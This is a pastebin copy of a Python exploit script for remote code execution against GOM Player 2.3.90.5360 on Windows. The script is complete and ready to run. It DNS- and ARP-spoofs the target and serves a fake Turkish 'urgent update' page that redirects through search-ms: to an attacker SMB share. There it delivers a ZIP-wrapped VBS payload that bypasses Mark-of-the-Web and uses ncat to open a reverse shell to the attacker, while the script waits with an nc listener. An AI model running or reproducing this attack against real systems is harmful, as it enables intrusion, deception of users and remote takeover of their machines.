Advertisement
FlyFar

GOM Player 2.3.90.5360 - Remote Code Execution (RCE)

Jan 20th, 2024
779
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.41 KB | Cybersecurity | 0 0
  1. # Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)
  2. # Date: 26.08.2023
  3. # Author: M. Akil Gündoğan
  4. # Contact: https://twitter.com/akilgundogan
  5. # Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/
  6. # Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
  7. # Version: 2.3.90.5360
  8. # Tested on: Windows 10 Pro x64 22H2 19045.3324
  9. # PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8
  10.  
  11. # Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.
  12.  
  13. # Vulnerability Description:
  14. # The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the
  15. # SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.
  16. # In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window.
  17.  
  18. # Full disclosure, developers should be more careful about software security.
  19.  
  20. # Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.
  21.  
  22. # Some spaghetti and a bad code but it works :)
  23.  
  24. banner = """\033[38;5;196m+-----------------------------------------------------------+
  25. |     GOM Player 2.3.90.5360 - Remote Code Execution        |
  26. |   Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-)  |
  27. +-----------------------------------------------------------+\033[0m""" +"""
  28. \033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""
  29.  
  30. import time,os,zipfile,subprocess,socket,sys
  31.  
  32. print(banner)
  33.  
  34. if os.geteuid() != 0:
  35.     print("You need root privileges to run the exploit, please use sudo...")
  36.     sys.exit(1)
  37.  
  38. targetIP = input("- Target IP address: ")
  39. listenPort = input("- Listening port for Reverse Shell: ")
  40.  
  41. def fCreate(fileName,fileContent): # File create func.
  42.     f = open(fileName,"w")
  43.     f.write(fileContent)
  44.     f.close()    
  45.  
  46. gw = os.popen("ip -4 route show default").read().split()
  47. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  48. s.connect((gw[2], 0))
  49. ipaddr = s.getsockname()[0]
  50. gateway = gw[2]
  51. host = socket.gethostname()
  52. print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host)
  53.  
  54. print("\n[*]- Stage 1: Downloading neccesary tools...")
  55.  
  56. smbFolderName = "GomUpdater" # change this (optional)
  57. expWorkDir = "gomExploitDir" # change this (optional)
  58. os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.
  59. time.sleep(1) # It's necessary for exploit stability.
  60. os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit.
  61. time.sleep(1) # It's necessary for exploit stability.
  62. os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat
  63. print("    [*] - Ncat has been downloaded.")
  64. subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket
  65. print("    [*] - Impacket has been downloaded.")
  66. subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py
  67. print("    [*] - DNSSpoof.py has been downloaded.")
  68.  
  69. print("[*]- Stage 2: Creating Attacker SMB Server...")
  70. subprocess.Popen("cd gomExploitDir/impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.
  71. time.sleep(5) # It's necessary for exploit stability.
  72.  
  73. smbIP = ipaddr
  74. spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP
  75.  
  76. print("[*]- Stage 3: Creating Attacker Web Page...")
  77.  
  78. # change this (optional)
  79. screenExpPage = """
  80. <meta charset="utf-8">
  81. <script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script>
  82. <script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';
  83. </script>
  84. """
  85.  
  86. fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)
  87. time.sleep(3) # It's necessary for exploit stability.
  88.  
  89. print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")
  90. vbsCommand = '''Set shell=CreateObject("wscript.shell")
  91. Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")
  92. WScript.Sleep 5000
  93. Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)
  94. vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)
  95. fCreate(expWorkDir + "/payload.vbs",vbsCommand)
  96.  
  97. urlShortcut = '''[InternetShortcut]
  98. URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs
  99. IDlist='''
  100. fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)
  101. time.sleep(3) # It's necessary for exploit stability.
  102. zipName = expWorkDir + "/smb-shared/archive.zip"
  103. payload_filename = os.path.join(expWorkDir, "payload.vbs")  
  104.  
  105. with zipfile.ZipFile(zipName, "w") as malzip:
  106.     malzip.write(payload_filename, arcname=os.path.basename(payload_filename))
  107.  
  108. print("[*]- Stage 5: Running the attacker's web server...")
  109. subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server
  110. time.sleep(3) # It's necessary for exploit stability.
  111.  
  112. print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")
  113. subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...
  114. time.sleep(10) # It's neccesary for exploit stability.
  115. os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target...
  116. os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.
  117. print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")
  118. subprocess.run("nc -lvnp " + listenPort,shell=True)
  119. subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...
  120.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement